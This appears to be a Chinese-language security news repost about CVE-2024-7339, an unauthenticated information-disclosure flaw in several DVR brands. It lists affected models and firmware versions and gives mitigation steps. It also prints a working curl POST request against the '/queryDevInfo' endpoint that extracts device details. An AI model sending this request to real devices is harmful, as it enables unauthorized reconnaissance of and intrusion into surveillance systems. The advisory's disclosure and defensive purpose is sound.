CVE-2024-7339:DVR 漏洞使超过 400,000 台设备面临黑客攻击

admin 2024年8月2日12:32:28评论178 views字数 1444阅读4分48秒阅读模式

CVE-2024-7339:DVR 漏洞使超过 400,000 台设备面临黑客攻击

一个被标记为 CVE-2024-7339 的安全漏洞被发现存在于多种流行的 DVR(数字视频录像机)设备中,包括 TVT、Provision-ISR、AVISION 等品牌的机型。该漏洞使多达 408,035 台设备面临未经授权的访问和潜在利用的风险。

该漏洞存在于设备的 Web 服务器中,该服务器缺乏访问控制。这允许攻击者远程提取敏感信息,包括硬件和软件版本、序列号和网络配置。利用这些数据,恶意行为者可以发起进一步的攻击,例如:

  • 有针对性的入侵:深入了解设备配置可以帮助制定攻击以达到最大影响。

  • 设备接管:利用暴露的漏洞来控制 DVR 以用于邪恶目的。

  • 数据泄露:可能访问存储在 DVR 上的录音或其他敏感数据。

如果您拥有或管理以下任何 DVR 型号,或使用下面列出的软件版本,则您的设备容易受到攻击:

  • 硬件: TVT DVR(TD-2104TS-CL、TD-2108TS-HP)、Provision-ISR DVR(SH-4050A5-5L(MM))、AVISION DVR(AV108T)等。

  • 软件版本: 1.3.4.22966B181219.D00.U1(4A21S)、1.3.4.22966B181219.D14.U1(8A41T)、1.3.4.22966B181219.D44.U1(16A82T)、1.3.4.24513B190218.D00.U1(8A21S)、1.3.3.20657B180918.D06.U2(4A41T)、1.3.4.24879B190222.D00.U2(8A21S)

利用过程很简单,只需向易受攻击的端点发送一个简单的 POST 请求。攻击者可以使用以下 cURL 命令来提取设备信息:

curl -X POST "http://<TARGET_IP>/queryDevInfo" 
-H "Accept-Language: en-US,en;q=0.9"
-H "Accept-Encoding: gzip, deflate"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Upgrade-Insecure-Requests: 1"
-H "Connection: keep-alive"
-H "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS like Mac OS X) AppleWebKit (KHTML, like Gecko) Version Mobile Safari"
-H "Content-Length: 103"
-d '<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>'

该命令向目标 DVR 发送精心设计的 XML 请求,然后目标 DVR 返回有关该设备的敏感信息。

你能做什么?

  • 检查更新:立即联系您的 DVR 制造商或供应商,确定是否有可用的补丁或固件更新来解决 CVE-2024-7339。及时应用任何更新。

  • 限制访问实施严格的访问控制和身份验证机制来管理对设备接口的访问。

  • 保护您的网络:实施强大的网络安全措施,例如防火墙和强密码,以限制对您的设备的未经授权的访问。

  • 监控可疑活动:密切关注您的 DVR 日志,发现任何异常行为,并向您的安全团队或制造商报告任何问题。

原文始发于微信公众号(独眼情报):CVE-2024-7339:DVR 漏洞使超过 400,000 台设备面临黑客攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月2日12:32:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-7339:DVR 漏洞使超过 400,000 台设备面临黑客攻击https://cn-sec.com/archives/3026116.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息